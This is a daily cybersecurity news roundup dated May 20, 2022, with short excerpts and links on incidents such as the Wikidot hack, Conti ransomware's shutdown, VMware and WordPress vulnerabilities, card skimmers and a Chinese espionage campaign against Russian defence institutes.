Friday, May 20, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
Wikidot Hacked By Russian Hackers
FROM THE MEDIA: Wikidot was hacked with all traces leading to the Russian foundation. Wikidot is the world’s largest wiki farm that allows anyone to start a wiki site. People use it to publish content, share documents, and collaborate with friends or co-workers.
Firstly, The website was hit by denial of service attacks; reported via a tweet. However, The roots of the attacks are believed to be originated from Russia. According to Wikidot’s tweet, the Russian Federation “left quite a mess”.
READ THE STORY: Fossbytes
Critical VMware vulnerabilities resurface after threat actors evade patches within 48 hours
FROM THE MEDIA: This is the latest in an ongoing security saga for VMware, a vendor threat actors have prodded frequently in the last year.
VMware products are a common and recurring target for threat actors. Log4Shell vulnerabilities in VMware Horizon were exploited to create web shells in January 2022, less than a month after the vendor issued security updates following initial Log4j vulnerability disclosures. Days later, threat actors were installing Cobalt Strike implants in multiple VMware Horizon servers.
READ THE STORY: CyberSecurityDive
This Russian botnet does far more than DDoS attacks - and on a massive scale
FROM THE MEDIA: An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale."
Simple steps can make the difference between losing your online accounts or maintaining what is now a precious commodity: Your privacy.
On Thursday, cybersecurity firm Nisos published new research revealing the inner workings of the unusual botnet.
Fronton first hit the headlines back in 2020 when ZDNet reported that a hacktivist group claimed to have broken into a contractor for the FSB, Russia's intelligence service, and published technical documents appearing to show the construction of the IoT botnet on the intelligence service's behalf.
READ THE STORY: ZDNET
Omnicell Suffers Ransomware Attack, Impact To Internal Systems
FROM THE MEDIA: It has been reported that multinational company Omnicell recently confirmed that it had experienced a data breach following a reported ransomware attack, impacting internal systems. The company, headquartered in Mountain View, California, USA, learned of the ransomware attack, which it disclosed on May 9 2022 in a 10-Q filing with the Securities and Exchange Commission. More details are likely to be disclosed in the coming weeks.
READ THE STORY: Information Security Buzz
QNAP urges users to update after new Deadbolt ransomware attacks discovered
FROM THE MEDIA: Data-storage hardware vendor QNAP urged users Thursday to immediately patch network attached storage (NAS) devices after several were infected recently with the Deadbolt ransomware.
QNAP said its Product Security Incident Response Team found that the new attacks “targeted NAS devices using QTS 4.3.6 and QTS 4.4.1, and the affected models were mainly TS-x51 series and TS-x53 series.” QTS is software that allows NAS users to manage the devices, share files and perform other tasks.
READ THE STORY: The Record
China’s GitHub clone making all repos private pending mysterious ‘review’
FROM THE MEDIA: China’s approved GitHub clone, Gitee, has warned users that it will make all existing repositories private pending a mysterious review of their content.
Gitee offers Git and Apache Subversion as a service. But while GitHub has occasionally been banned in China, Gitee was anointed as China’s designated open source development hub in 2020, after the nation’s Ministry of Industry and Information Technology conducted a bidding process.
READ THE STORY: The Register
Canada to ban Chinese telecoms Huawei and ZTE from 5G networks
FROM THE MEDIA: Canada said it will move to ban Huawei and ZTE from providing 5G services in the country, in the latest move by a US ally to target the Chinese equipment telecoms manufacturers. François-Philippe Champagne, Canada’s minister of innovation, science and industry, said on Thursday that the country intended “to prohibit the inclusion of Huawei and ZTE’s products and services in Canada’s telecommunications system”. “Providers who already have this equipment installed will be required to cease its use and remove it,” he said. The federal government will not compensate companies for the removal of Huawei and ZTE gear, he added. Equipment used for 4G networks will also need to be removed.
READ THE STORY: FT
Alarming surge in Conti Ransomware Group activity
FROM THE MEDIA: A new report has identified a 7.6 per cent increase in the number of vulnerabilities tied to ransomware in Q1 2022, with the Conti ransomware group exploiting most of those vulnerabilities.
Ivanti has announced the results of the Ransomware Index Report Q1 2022 that it conducted with Cyber Security Works, a Certifying Numbering Authority (CNA) and Cyware, a provider of the technology platform to build Cyber Fusion Centres.
The report uncovered 22 new vulnerabilities tied to ransomware (bringing the total to 310) and connected Conti, a prolific ransomware group that pledged support for the Russian government following the invasion of Ukraine, to 19 of those new vulnerabilities.
READ THE STORY: SecurityBrief
Cyber firm Darktrace distances itself from fraud case
FROM THE MEDIA: British cyber security firm Darktrace on Thursday denied it had been targeted by a fraud probe into US tech giant Hewlett Packard's 2011 purchase of software group Autonomy.
Darktrace shares have tanked since Wednesday after its chief strategy officer Nicole Eagan was named in a British High Court ruling against former Autonomy boss Mike Lynch, who was accused of inflating his company's value before the takeover.
HP won a multi-billion-dollar civil fraud case in January, but the full text of the judgement was published only this week.
READ THE STORY: IndiaTimes
US States Ignoring China Cyber Threats, Says Data Group
FROM THE MEDIA: While US federal agencies and the military have responded robustly to China cyber threats, the 50 states are lagging behind in protection, a consultancy has warned.
ChinaTechThreat.com (CTT) said it had recommended four specific policy ideas for US state governments to counter China cyber threats.
CTT said it had been been closely tracking what it called a “state-federal tech threat disconnect” in the US.
The consultancy urged state authorities to restrict Chinese government-owned companies from state purchase and contracts and restrict university partnerships that strengthen the Chinese military.
READ THE STORY: Asian Financial
Cyber security: Global food supply chain at risk from malicious hackers
FROM THE MEDIA: Modern "smart" farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk, experts are warning. It is feared hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Agricultural manufacturing giant John Deere says it is now working to fix any weak spots in its software.
A recent University of Cambridge report said automatic crop sprayers, drones and robotic harvesters could be hacked. The UK government and the FBI have warned that the threat of cyber-attacks is growing.
READ THE STORY: BBC
Conti ransomware shuts down operation, rebrands into smaller units
FROM THE MEDIA: The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more. This news comes from Advanced Intel's Yelisey Boguslavskiy, who tweeted this afternoon that the gang's internal infrastructure was turned off.
While public-facing 'Conti News' data leak and the ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline.
READ THE STORY: BleepingComputer
Trend Micro blocked 107mln threats in Saudi Arabia
FROM THE MEDIA: Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global leader in cybersecurity solutions, today released its 2021 annual cybersecurity report: Navigating New Frontiers. The report highlights the growing rate of cyber-attacks by malicious actors on digital infrastructures and individuals in the modern-day hybrid work environment.
The report states that globally Trend Micro solutions stopped over 94.2 billion threats in 2021, a 42% increase in the number of detections recorded in 2020. Attacks had surged over 53 billion in the second half of 2021, blocking 41 billion threats in H1 2021. Ransomware attackers are shifting their focus to critical businesses and industries more likely to pay, and double extortion tactics ensure that they are able to profit. Ransomware-as-a-service offerings have opened the market to cybercriminals with limited technical knowledge, as well as given rise to more specialization, such as initial access brokers who are now an essential part of the cybercrime supply chain. Threat actors are getting better at exploiting human error to compromise cloud infrastructure and remote workers. Home workers are often prone to take more risks than those in the office, which makes phishing a greater risk.
READ THE STORY: Zawya
Analyzing a WooCommerce Credit Card Skimmer
FROM THE MEDIA: The number of credit card skimmers targeting WooCommerce websites has skyrocketed over the past year, and threat actors have become increasingly creative in the different ways they obfuscate their payloads to avoid traditional detection.
During a recent investigation for an infected WordPress website, we discovered an obfuscated credit card stealer hiding amongst the website’s theme files which was exfiltrating stolen credit card details from the WooCommerce plugin.
READ THE STORY: SecurityBoulevard
Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
FROM THE MEDIA: A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found.
WordFence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, one of five vulnerabilities he found between early April and early May in the Jupiter and JupiterX Premium WordPress themes, he revealed in a blog post published Wednesday.
One of the flaws—tracked as CVE-2022-1654 and rated as 9.9, or critical on the CVSS–allows for “any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin,” he wrote. The plugin is required to run the JupiterX theme.
READ THE STORY: Threatpost
A year-long Chinese Cyber Espionage Campaign in Russia now targets Defense Research Institutes
FROM THE MEDIA: Check Point Research (CPR) detects an ongoing, cyber espionage operation targeting Russian defense research institutes. Attributed to Chinese nation-state actors, the operation uses spear-phishing emails sent under the guise of the Russian Ministry of Health to collect sensitive information. Emails caught by CPR contained malicious documents that used the Western sanctions against Russia as a decoy, among other social engineering techniques. The threat actors were able to evade detection for nearly 11 months by using new and undocumented tools that CPR now details for the first time. CPR has named the campaign “Twisted Panda” to reflect the sophistication of the tools observed and traced to China.
Russian victims belong to a holding company within the Russian state-owned defense conglomerate called Rostec Corporation, Russia’s largest holding company in the radio-electronics industry. Emails contained subject lines “List of <target institute name> persons under US sanctions for invading Ukraine” and “US Spread of Deadly Pathogens in Belarus” Campaign bears multiple overlaps with Chinese advanced and long-standing cyberespionage actors, including APT10 and Mustang Panda
READ THE STORY: APN News
Phishing websites now use chatbots to steal your credentials
FROM THE MEDIA: Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors.
This approach automates the process for attackers and gives a sense of legitimacy to visitors of the malicious sites, as chatbots are commonly found on websites for legitimate brands. This new development in phishing attacks was discovered by researchers at Trustwave, who shared the report with Bleeping Computer before publication.
READ THE STORY: BleepingComputer
Steganography in Cybersecurity: A Growing Attack Vector
FROM THE MEDIA: Fully aware of increasing investments made by companies in cybersecurity tools, threat actors constantly tweak, diversify and refine their cyberattack strategies in order to evade detection. One recent trend is an increase in steganography as an attack vector to achieve different objectives, such as masking communications or installing malware. This article explains what steganography in cybersecurity is and why cyber attackers might use this technique, as well as provides some examples of real-world incidents that relied upon steganography, plus mitigation advice.
READ THE STORY: SecurityBoulevard
Threat actors compromising US business online checkout pages to steal credit card information
FROM THE MEDIA: According to the FBI, a US business was targeted in September 2020 by an unidentified threat actor, who inserted malicious PHP code into the checkout page of the targeted company website.
The checkout page was modified to include a link to another piece of code named “cart_required_files.php.” That file, in turn, led to another malicious PHP script dubbed “TempOrders.php” which contained code to scrape and exfiltrate unsuspecting customer data from the shopping cart. Every user buying something on that compromised website would unwittingly send their credit card data to the fraudsters.
READ THE STORY: TechRepublic
CISA Issues Advisory on Poor Security Configurations
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) on May 17 issued a new advisory highlighting how cyber threat-actors are exploiting poor security configurations.
CISA said the poor security configurations include security misconfigurations or network elements that are left unsecured entirely. In addition to poor configurations, CISA noted that threat actors exploit weak controls and “other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system.”
READ THE STORY: Meritalk
CISOs worried about material attacks, boardroom backing
FROM THE MEDIA: The threat of substantial material attacks and getting board support for their efforts are top-of-mind issues among the world's CISOs, according to a new report released by Proofpoint.
While nearly half of the 1,400 CISOs surveyed for the annual Voice of the CISO report (48 per cent) say their organization is at risk of suffering a material cyber attack in the next 12 months. That's substantially lower than 2021, when nearly two-thirds of the CISOs (64 per cent) expressed similar sentiments.
READ THE STORY: Reseller
Ransomware Attack Vectors: RDP and Phishing Still Dominate
FROM THE MEDIA: Attackers who successfully infect targets with ransomware primarily first gain access by exploiting poorly secured remote access connections or by using malware-laden phishing emails. So reports cybersecurity firm Group-IB, based on more than 700 attacks the company's incident response team investigated in 2021.
The average ransom amount demanded in the attacks Group-IB investigated last year was $247,000, which is says was an increase of 45% from 2020. Last year, 63% of all ransomware attacks it investigated involved data exfiltration. How are attackers hacking victims? The firm found 47% of attacks traced to access of an external service - often remote desktop protocol or VPN - while 26% of attacks traced to phishing.
READ THE STORY: Bank InfoSecurity
Items of interest
Interrogating China’s global security initiative
FROM THE MEDIA: Escalating pockets of regional tensions and their impacts beyond the immediate centre of conflict is generating and inflaming security threats across countries. For example, the immediate consequences of the collapse of the Colonel Muammar Gadhafi government in Libya is the flow of light weapons and military instructors which has fed insurgencies in the Sahel in West Africa, with Nigeria as a principal victim where extremist insurgency has mutated to violent criminal activities of banditry and kidnapping. The violent overthrow of the legitimate government of Libya in 2011, with the active connivance of the U.S-led North Atlantic Treaty Organization, (NATO) and subsequent assassination of its leader, Colonel Gadhafi, was the crucial enabler to the chain of destructive insurgencies, banditries and other forms of venal criminal activities that has engulfed the Sahel region and Nigeria. The conflict in the Sahel inspired by extremist insurgency has fuelled political instability paving the way for the return and establishment of military regimes in Mali and Burkina Faso, two countries in the Sahel, caught up in the murderous backlash of the violent regime change in Libya, promoted by the U.S-led NATO.
Nigeria’s Northeast has long combusted in the murderous insurgency of Boko Haram and the Islamic State in West Africa Province, ISWAP. The Northwest and other parts of the country is not spared the spate of criminal impunity fuelled by the flows of illegal weapons traded from the huge Libya armoury flung open by the NATO’s inspired destabilization of the country.
With the confluence of these and other factors fuelling tensions and feeding the increasing security governance and productive capacity deficits across the world, China’s recent global security initiative is worth a careful scrutiny and interrogation.
READ THE STORY: The Nation
FBI and CISA on Latest Russian Cyber Threats (Video)
FROM THE MEDIA: The U.S. Chamber of Commerce was joined by the FBI and CISA for a virtual briefing about Russian cyber threats. In this conversation, Kurtis Ronnow, Deputy Assistant Director, FBI Counterintelligence Division; W. Mike Herrington, Section Chief, FBI Cyber Division; and Matt Hartman, Deputy Executive Assistant Director of Cybersecurity, CISA discussed the cyber aspects of the war in Ukraine, the tactics employed by Russian state-sponsored cyber actors, and why we have not seen Russian cyberattacks on the scale that many experts expected when the conflict began.
Attacking The Malware With AI (Video)
FROM THE MEDIA: Malware poses one of the greatest threats to the cyber industry. More than 450,000 new malicious programs and potentially unwanted applications (PUA) are registered every day (AV-Test Institute, 2022). As a result, there is an imperative need to automate the process of malware analysis by onboarding artificial intelligence into our defense toolbox.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com